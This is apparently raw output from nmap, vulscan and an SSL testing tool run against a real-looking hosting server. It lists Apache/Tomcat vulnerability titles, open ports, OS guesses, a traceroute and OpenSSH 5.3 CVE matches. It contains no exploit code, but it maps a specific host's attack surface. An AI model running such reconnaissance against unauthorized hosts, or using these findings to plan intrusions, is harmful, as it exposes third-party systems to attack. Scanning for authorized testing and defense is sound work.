6495| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
6496| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
6497| [42091] Apache Maven Site Plugin Installation Permission Weakness
6498| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
6499| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
6500| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
6501| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
6502| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
6503| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
6504| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
6505| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
6506| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
6507| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
6508| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
6509| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
6510| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
6511| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
6512| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
6513| [40262] Apache HTTP Server mod_status refresh XSS
6514| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
| [36080] Apache Tomcat JSP Examples Crafted URI XSS
| [36079] Apache Tomcat Manager Uploaded Filename XSS
| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
| [34881] Apache Tomcat Malformed Accept-Language Header XSS
| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
| [32724] Apache mod_python _filter_read Freed Memory Disclosure
| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
| [24365] Apache Struts Multiple Function Error Message XSS
| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
| [22459] Apache Geronimo Error Page XSS
| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
| [21021] Apache Struts Error Message XSS
| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
| [20439] Apache Tomcat Directory Listing Saturation DoS
| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
| [20285] Apache HTTP Server Log File Control Character Injection
| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
| [19821] Apache Tomcat Malformed Post Request Information Disclosure
| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
| [18233] Apache HTTP Server htdigest user Variable Overfow
| [17738] Apache HTTP Server HTTP Request Smuggling
| [16586] Apache HTTP Server Win32 GET Overflow DoS
| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
| [13304] Apache Tomcat realPath.jsp Path Disclosure
| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
| [12848] Apache HTTP Server htdigest realm Variable Overflow
| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
| [12557] Apache HTTP Server prefork MPM accept Error DoS
| [12233] Apache Tomcat MS-DOS Device Name Request DoS
| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
| [12231] Apache Tomcat web.xml Arbitrary File Access
| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
| [12178] Apache Jakarta Lucene results.jsp XSS
| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
| [10471] Apache Xerces-C++ XML Parser DoS
| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
| [10068] Apache HTTP Server htpasswd Local Overflow
| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
| [9717] Apache HTTP Server mod_cookies Cookie Overflow
| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
| [9714] Apache Authentication Module Threaded MPM DoS
| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
| [9208] Apache Tomcat .jsp Encoded Newline XSS
| [9204] Apache Tomcat ROOT Application XSS
| [9203] Apache Tomcat examples Application XSS
| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
| [7611] Apache HTTP Server mod_alias Local Overflow
| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
| [6882] Apache mod_python Malformed Query String Variant DoS
| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
| [5526] Apache Tomcat Long .JSP URI Path Disclosure
| [5278] Apache Tomcat web.xml Restriction Bypass
| [5051] Apache Tomcat Null Character DoS
| [4973] Apache Tomcat servlet Mapping XSS
| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
| [4568] mod_survey For Apache ENV Tags SQL Injection
| [4553] Apache HTTP Server ApacheBench Overflow DoS
| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
| [4383] Apache HTTP Server Socket Race Condition DoS
| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
| [4231] Apache Cocoon Error Page Server Path Disclosure
| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
| [3322] mod_php for Apache HTTP Server Process Hijack
| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
| [2885] Apache mod_python Malformed Query String DoS
| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
| [2733] Apache HTTP Server mod_rewrite Local Overflow
| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
| [2149] Apache::Gallery Privilege Escalation
| [2107] Apache HTTP Server mod_ssl Host: Header XSS
| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
| [1833] Apache HTTP Server Multiple Slash GET Request DoS
| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
| [872] Apache Tomcat Multiple Default Accounts
| [862] Apache HTTP Server SSI Error Page XSS
| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
| [845] Apache Tomcat MSDOS Device XSS
| [844] Apache Tomcat Java Servlet Error Page XSS
| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
| [838] Apache HTTP Server Chunked Encoding Remote Overflow
| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
| [775] Apache mod_python Module Importing Privilege Function Execution
| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
| [637] Apache HTTP Server UserDir Directive Username Enumeration
| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
| [562] Apache HTTP Server mod_info /server-info Information Disclosure
| [561] Apache Web Servers mod_status /server-status Information Disclosure
| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
| [376] Apache Tomcat contextAdmin Arbitrary File Access
| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
| [222] Apache HTTP Server test-cgi Arbitrary File Access
| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|firewall|storage-misc|VoIP phone
Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.859 days (since Tue Jan 14 23:05:29 2020)
Network Distance: 14 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 389.15 ms 10.248.204.1
2 389.22 ms salmondeal.com.0.116.160.in-addr.arpa (160.116.0.161)
3 389.20 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
4 389.31 ms bzq-219-189-185.cablep.bezeqint.net (62.219.189.185)
5 389.24 ms bzq-114-65-1.cust.bezeqint.net (192.114.65.1)
6 389.30 ms bzq-219-189-78.cablep.bezeqint.net (62.219.189.78)
7 389.34 ms bzq-179-161-218.pop.bezeqint.net (212.179.161.218)
8 389.34 ms ae8.cr1-fra2.ip4.gtt.net (46.33.89.237)
9 389.39 ms ge8-0.1000M.asd9nxg1.ip.tele.dk (213.200.75.30)
10 233.09 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
11 322.11 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
12 329.14 ms 212.237.248.7
13 ...
14 329.19 ms linux307.unoeuro.com (93.191.156.197)

NSE: Script Post-scanning.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
######################################################################################################################################
Version: 1.11.13-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 93.191.156.197

Testing SSL server 93.191.156.197 on port 443 using SNI name 93.191.156.197

 TLS Fallback SCSV:
Server supports TLS Fallback SCSV

 TLS renegotiation:
Session renegotiation not supported

 TLS Compression:
Compression disabled

 Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

 Supported Server Cipher(s):
Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits

 SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength: 2048

Subject: *.unoeuro.com
Altnames: DNS:*.unoeuro.com, DNS:unoeuro.com
Issuer: Sectigo RSA Domain Validation Secure Server CA

Not valid before: Feb 6 00:00:00 2019 GMT
Not valid after: Feb 5 23:59:59 2021 GMT
######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-16 19:48 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:48
Completed NSE at 19:48, 0.00s elapsed
Initiating NSE at 19:48
Completed NSE at 19:48, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:48
Completed Parallel DNS resolution of 1 host. at 19:48, 0.02s elapsed
Initiating SYN Stealth Scan at 19:48
Scanning linux307.unoeuro.com (93.191.156.197) [65535 ports]
Discovered open port 80/tcp on 93.191.156.197
Discovered open port 443/tcp on 93.191.156.197
Discovered open port 21/tcp on 93.191.156.197
Discovered open port 22/tcp on 93.191.156.197
Completed SYN Stealth Scan at 19:56, 492.14s elapsed (65535 total ports)
Initiating Service scan at 19:56
Scanning 4 services on linux307.unoeuro.com (93.191.156.197)
Completed Service scan at 19:56, 14.04s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against linux307.unoeuro.com (93.191.156.197)
Retrying OS detection (try #2) against linux307.unoeuro.com (93.191.156.197)
Initiating Traceroute at 19:56
Completed Traceroute at 19:56, 3.23s elapsed
Initiating Parallel DNS resolution of 12 hosts. at 19:56
Completed Parallel DNS resolution of 12 hosts. at 19:56, 0.62s elapsed
NSE: Script scanning 93.191.156.197.
Initiating NSE at 19:56
Completed NSE at 19:56, 10.73s elapsed
Initiating NSE at 19:56
Completed NSE at 19:57, 3.42s elapsed
Nmap scan report for linux307.unoeuro.com (93.191.156.197)
Host is up (0.35s latency).
Not shown: 65525 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open tcpwrapped
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:5.3:
| CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
| CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
| CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
| CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
| CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
|_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
| vulscan: VulDB - https://vuldb.com:
| [80267] OpenSSH up to 5.x/6.x/7.1p1 Forward Option roaming_common.c roaming_read/roaming_write memory corruption
| [80266] OpenSSH up to 5.x/6.x/7.1p1 roaming_common.c resend_bytes information disclosure
| [4584] OpenSSH up to 5.7 auth-options.c information disclosure
| [4282] OpenSSH 5.6/5.7 Legacy Certificate memory corruption
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2006-0883] OpenSSH on FreeBSD 5.3 and 5.4, when used with OpenPAM, does not properly handle when a forked child process terminates during PAM authentication, which allows remote attackers to cause a denial of service (client connection refusal) by connecting multiple times to the SSH server, waiting for the password prompt, then disconnecting.
| [CVE-2012-0814] The auth_parse_options function in auth-options.c in sshd in OpenSSH before 5.7 provides debug messages containing authorized_keys command options, which allows remote authenticated users to obtain potentially sensitive information by reading these messages, as demonstrated by the shared user account required by Gitolite. NOTE: this can cross privilege boundaries because a user account may intentionally have no shell or filesystem access, and therefore may have no supported way to read an authorized_keys file in its own home directory.
| [CVE-2011-5000] The ssh_gssapi_parse_ename function in gss-serv.c in OpenSSH 5.8 and earlier, when gssapi-with-mic authentication is enabled, allows remote authenticated users to cause a denial of service (memory consumption) via a large value in a certain length field. NOTE: there may be limited scenarios in which this issue is relevant.
| [CVE-2011-0539] The key_certify function in usr.bin/ssh/key.c in OpenSSH 5.6 and 5.7, when generating legacy certificates using the -t command-line option in ssh-keygen, does not initialize the nonce field, which might allow remote attackers to obtain sensitive stack memory contents or make it easier to conduct hash collision attacks.
| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
